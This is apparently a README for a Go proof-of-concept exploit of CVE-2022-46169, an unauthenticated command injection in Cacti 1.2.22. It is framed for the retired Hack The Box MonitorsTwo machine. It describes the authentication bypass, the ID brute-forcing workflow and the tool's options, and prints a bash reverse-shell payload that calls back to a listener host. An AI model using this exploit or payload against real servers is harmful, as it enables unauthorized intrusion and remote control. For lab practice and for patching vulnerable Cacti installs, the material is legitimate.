## https://sploitus.com/exploit?id=A8D758B5-CAE2-5AF1-9311-6695FB19CC90
# CVE-2022-46169 Proof-of-Concept Exploit
## Overview
This is a Proof-of-Concept (PoC) exploit for **CVE-2022-46169**, targeting a **Cacti 1.2.22 Remote Code Execution** vulnerability. The exploit was created for educational purposes and for authorized penetration testing only, specifically for the retired **MonitorsTwo** machine available on **Hack The Box**.
**โ Disclaimer: This code is provided for educational purposes only. The author is not responsible for any misuse. Unauthorized access or testing on systems without permission is illegal and may result in severe legal consequences.**
**USE AT YOUR OWN RISK.**
## Vulnerability Overview
This exploit targets a command injection vulnerability in Cacti versions <=1.2.22. The `remote_agent.php` file does not require authenticaiton, allowing attackers to bypass authentication by manipulating the `X-Forwarded-For` header. This bypass allows access to execute arbitrary commands via the `poller_id` parameter in the `polldata` action, which is processed using `proc_open`. The issue has been addressed in versions >=1.2.23.
## Usage
```bash
go run CVE-2022-46169.go [OPTIONS]
```
### Options:
- `-t`: Target Cacti URL (e.g., `http://<target>/cacti`)
- `-i`: Listen IP address for reverse shell
- `-p`: Listen port for reverse shell
- `-d`: (Optional) Enable debug logging
- `-x`: (Optional) Set http proxy (e.g., `http://127.0.0.1:8080`)
### Example:
```bash
go run CVE-2022-46169.go -t http://<target>/cacti -i 10.10.10.10 -p 9001
```
This command will generate and send the following reverse shell payload:
```bash
bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"
```
## Workflow
1. **Target Confirmation**: Checks if the target is running Cacti 1.2.22 and by requesting the `/remote_agent.php` page.
2. **Bruteforce**: The exploit bruteforces valid `host_id` and `local_data_id` values.
3. **Exploit Execution**: Once valid IDs are found, the payload is encoded and sent to the target via a malicious HTTP request.
4. **Payload Execution**: If successful, the payload is executed on the target system, and a reverse shell connection is established.
## Debug Mode
Use the `-d` flag to enable verbose output for debugging. This mode will display additional information, such as request URLs and responses, to help troubleshoot any issues during execution.
```bash
go run CVE-2022-46169.go -t http://target/cacti -i 10.10.10.10 -p 9001 -d
```
## Using HTTP Proxy
Use the `-x` flag with the http proxy to send all requests through a proxy.
```bash
go run CVE-2022-46169.go -t http://target/cacti -i 10.10.10.10 -p 9001 -x http://127.0.0.1:8080
```